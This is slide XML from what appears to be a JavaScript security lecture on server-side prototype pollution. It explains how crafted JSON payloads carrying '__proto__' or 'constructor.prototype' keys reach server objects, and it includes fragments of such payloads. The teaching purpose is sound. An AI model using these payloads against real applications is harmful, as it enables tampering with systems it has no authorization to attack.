                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__"</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"test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test</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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test"]</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"[object Object]"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The JSON payload is directly translated into an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>This time, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> do get set, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>we can set it to an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Even though the prototype of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>req.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, it still does not pollute the prototype (body-parser handles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> specially, obviously because it is used in real world apps)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2640580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Inputting objects 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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These cover the most common ways to send crafted objects to servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>To conclude, POST-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> with JSON payload is the most useful one for setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> to an arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>objectBut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> why are we covering other methods?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>In some circumstances, you can do prototype pollution by setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> [1] instead, and this property will not be ignored by the above methods that support nested objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> will be covered in the next section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Of course, there are a lot of other uncommon ways to send crafted objects to servers, and we cannot enumerate them all here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>For these, you will need to think and do the testing yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The methods above are server-side prototype pollution only; for client-side, crafting the object might be easier depending on the challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>None of the methods above can pollute the prototype by itself, and some other vulnerable code is required, which will be covered in the next section now</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CC216B8-FB8D-2CEE-5E15-AFEC291D1BFF}"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46551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729450" y="1322450"/>
            <a:ext cx="7688400" cy="2229352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>COMP 3021S JavaScript programming (0 units)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="e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Polluting prototypes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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Previously, we pollute the prototype by setting properties on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en-US" altLang="zh-HK" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Nowadays, we no longer do monkey patching [1], so we are unlikely to see code touching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dirty="0"/>
              <a:t> and other prototypes at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>This is even more so with user-controllable property names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>However, all JavaScript applications must eventually touch objects, so we can access prototypes from an object by…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: We have already explained in the previous slides; hopefully, you are listening…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> [2]: It can similarly access the prototype like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>, but both are normal properties instead of pairs of getter and setter; also see the diagrams below for a quick explanation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CC216B8-FB8D-2CEE-5E15-AFEC291D1BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="7209402" cy="33855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https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain#implicit_constructors_of_literals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
              <a:t>, see the warning section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{962DFC19-4BE1-D90D-032A-23A0ADD50A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="54604" y="3671522"/>
            <a:ext cx="3866127" cy="1133424"/>
            <a:chOff x="54604" y="3671522"/>
            <a:chExt cx="3866127" cy="1133424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8DEEBF0-EB57-D30B-1016-BDBC854E86D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="261093" y="4497169"/>
              <a:ext cx="1241868" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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Date</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434F54"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A721406C-D58A-A469-6FC1-96C1911BBDCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2230225" y="4103238"/>
              <a:ext cx="1690506" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D35400"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Date</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7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A40208-9EFA-55C4-56A6-A70D43FB9B06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="569990" y="3671522"/>
              <a:ext cx="624074"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Date</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="Group 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5409EE5E-166D-00BD-06AB-AEC38E7C7091}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="54604" y="3985649"/>
              <a:ext cx="1355599" cy="517870"/>
              <a:chOff x="54604" y="3985649"/>
              <a:chExt cx="1355599" cy="517870"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="10" name="Connector: Curved 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D95425-96E0-6838-3F28-CB00499AC3F5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="3" idx="0"/>
                <a:endCxn id="7" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="623092" y="4238234"/>
                <a:ext cx="517870"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341378E-EF52-B015-F731-7B96A9F03D27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="54604" y="4103792"/>
                <a:ext cx="1355599" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="434F54"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>constructor</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Group 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE125008-AC61-78D9-358F-D75026814DCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1194064" y="3825411"/>
              <a:ext cx="1143495" cy="431716"/>
              <a:chOff x="1194064" y="3825411"/>
              <a:chExt cx="1143495" cy="431716"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="12" name="Connector: Curved 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454AF0F1-25DC-921B-EEAC-097E4E2D5264}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="7" idx="3"/>
                <a:endCxn id="6" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1194064" y="3825411"/>
                <a:ext cx="1036161" cy="43171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1F5A929-9C12-BAC5-2250-90F023E0F117}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1194064" y="3881615"/>
                <a:ext cx="1143495" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="434F54"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>prototype</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Group 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{782763EC-084B-CCCD-A7EA-1612E8243074}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1396311" y="4257127"/>
              <a:ext cx="1562991" cy="468336"/>
              <a:chOff x="1396311" y="4257127"/>
              <a:chExt cx="1562991" cy="468336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="14" name="Connector: Curved 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDF3700-126F-42E4-E753-52D358727D75}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="3" idx="3"/>
                <a:endCxn id="6" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1502961" y="4257127"/>
                <a:ext cx="727264" cy="3939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A00C05B-02BC-7A4D-3038-02D8DE38BEC1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1396311" y="4417686"/>
                <a:ext cx="1562991" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="9B8D8F"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>[[Prototype]]</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF8965A-D113-17B6-84B6-2BB4AC3A8B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4809899" y="3692689"/>
            <a:ext cx="4207752" cy="1203889"/>
            <a:chOff x="9033" y="3671523"/>
            <a:chExt cx="4207752" cy="1203889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
